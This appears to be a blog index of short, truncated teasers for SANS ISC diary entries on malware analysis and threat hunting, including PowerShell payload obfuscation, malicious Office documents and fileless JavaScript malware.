I published the following diary on isc.sans.edu: “Malware Triage with FLOSS: API Calls Based Behavior“: Malware triage is a key component of your hunting process. When you collect suspicious files from multiple sources, you need a tool to automatically process them to extract useful information. To achieve this task, I’m using
I published the following diary on isc.sans.edu: “Using Nmap As a Lightweight Vulnerability Scanner“: Yesterday, Bojan wrote a nice diary about the power of the Nmap scripting language (based on LUA). The well-known port scanner can be extended with plenty of scripts that are launched depending on the detected ports.
I published the following diary on isc.sans.edu: “Keeping an Eye on Malicious Files Life Time“: We know that today’s malware campaigns are based on fresh files. Each piece of malware has a unique hash and it makes the detection based on lists of hashes not very useful these days. But
I published the following diary on isc.sans.edu: “Collecting IOCs from IMAP Folder“: I’ve plenty of subscriptions to “cyber security” mailing lists that generate a lot of traffic. Even if we try to get rid of emails, that’s a fact: email remains a key communication channel. Some mailing lists posts contain
I published the following diary on isc.sans.edu: “Powershell Payload Stored in a PSCredential Object“: An interesting obfuscation technique to store a malicious payload in a PowerShell script: In a PSCredential object! The PSCredential class can be used to manage credentials in a centralized way. Just have a look at this example. First, let’s encrypt
I published the following diary on isc.sans.edu: “Malicious Excel With a Strong Obfuscation and Sandbox Evasion“: For a few weeks, we see a bunch of Excel documents spread in the wild with Macro V4. But VBA macros remain a classic way to drop the next stage of the attack on the
I published the following diary on isc.sans.edu: “Weaponized RTF Document Generator & Mailer in PowerShell“: Another piece of malicious PowerShell script that I found while hunting. Like many malicious activities that occur in those days, it is related to the COVID19 pandemic. Its purpose of simple: It checks if Outlook
I published the following diary on isc.sans.edu: “PowerShell Sample Extracting Payload From SSL“: Another diary, another technique to fetch a malicious payload and execute it on the victim host. I spotted this piece of Powershell code this morning while reviewing my hunting results. It implements a very interesting technique. As usual,
I published the following diary on isc.sans.edu: “Obfuscated with a Simple 0x0A“: With the current Coronavirus pandemic, we continue to see more and more malicious activity around this topic. Today, we got a report from a reader who found a nice malicious Word document part of a Coronavirus phishing campaign. I
I published the following diary on isc.sans.edu: “Malicious JavaScript Dropping Payload in the Registry“: When we speak about “fileless” malware, it means that the malware does not use the standard filesystem to store temporary files or payloads. But they need to write data somewhere in the system for persistence or
